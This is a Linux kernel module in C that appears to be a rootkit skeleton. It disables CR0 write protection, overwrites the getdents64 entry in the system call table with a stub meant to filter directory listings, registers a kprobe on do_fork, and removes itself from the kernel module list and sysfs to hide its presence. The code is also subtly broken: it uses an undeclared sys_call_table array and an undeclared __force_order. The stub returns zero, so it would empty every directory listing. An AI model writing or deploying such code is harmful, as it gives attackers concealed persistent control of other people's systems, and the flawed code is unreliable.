#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/kprobes.h>
#include <linux/seq_file.h>
#include <linux/syscalls.h>
#include <linux/slab.h>

static struct kprobe kp;
static unsigned long sys_call_table_addr;
static int hidden;

static void update_cr0(unsigned long val)
{
    asm volatile("mov %0, %%cr0" : "+r" (val), "+m" (__force_order));
}

static int handler_pre(struct kprobe *p, struct pt_regs *regs)
{
    pr_info("pre_handler: p->addr=0x%p\n", (void *)p->addr);
    pr_info("eax: %08lx ebx: %08lx ecx: %08lx edx: %08lx\n", regs->ax, regs->bx, regs->cx, regs->dx);
    pr_info("esi: %08lx edi: %08lx ebp: %08lx esp: %08lx\n", regs->si, regs->di, regs->bp, regs->sp);
    pr_info("ds: %04x es: %04x\n", (unsigned int)regs->ds, (unsigned int)regs->es);
    return 0;
}

static void handler_post(struct kprobe *p, struct pt_regs *regs, unsigned long flags)
{
    pr_info("post_handler: p->addr=0x%p\n", (void *)p->addr);
}

static int handler_fault(struct kprobe *p, struct pt_regs *regs, int trapnr)
{
    pr_info("fault_handler: p->addr=0x%p, trap #%d\n", (void *)p->addr, trapnr);
    return 0;
}

static int hide_module(int hidden)
{
    if (hidden) {
        list_del_init(&THIS_MODULE->list);
        kobject_del(&THIS_MODULE->mkobj.kobj);
    }
    return 0;
}

static long (*original_getdents64)(const struct pt_regs *regs);

static long my_getdents64(const struct pt_regs *regs)
{
    // Your custom implementation here to filter directory entries
    return 0;
}

static int __init modinit(void)
{
    unsigned long old_cr0;

    sys_call_table_addr = (unsigned long)kallsyms_lookup_name("sys_call_table");

    pr_info("sys_call_table address: 0x%lx\n", sys_call_table_addr);

    original_getdents64 = (void *)sys_call_table[__NR_getdents64];
    pr_info("Original sys_getdents64: 0x%p\n", original_getdents64);

    // Enable writing to CR0
    old_cr0 = read_cr0();
    update_cr0(old_cr0 & ~X86_CR0_WP);

    sys_call_table[__NR_getdents64] = (void *)my_getdents64;

    // Restore CR0
    update_cr0(old_cr0);

    kp.pre_handler = handler_pre;
    kp.post_handler = handler_post;
    kp.fault_handler = handler_fault;
    kp.symbol_name = "do_fork";

    if (register_kprobe(&kp) < 0) {
        pr_err("register_kprobe failed\n");
        return -1;
    }

    hide_module(hidden);

    pr_info("Module loaded\n");

    return 0;
}

static void __exit modexit(void)
{
    unsigned long old_cr0;

    // Disable writing to CR0
    old_cr0 = read_cr0();
    update_cr0(old_cr0 & ~X86_CR0_WP);

    sys_call_table[__NR_getdents64] = (void *)original_getdents64;

    // Restore CR0
    update_cr0(old_cr0);

    unregister_kprobe(&kp);

    pr_info("Module unloaded\n");
}

module_init(modinit);
module_exit(modexit);

MODULE_LICENSE("GPL");
MODULE_AUTHOR("Your Name");
MODULE_DESCRIPTION("Kernel module to intercept getdents64 syscall");
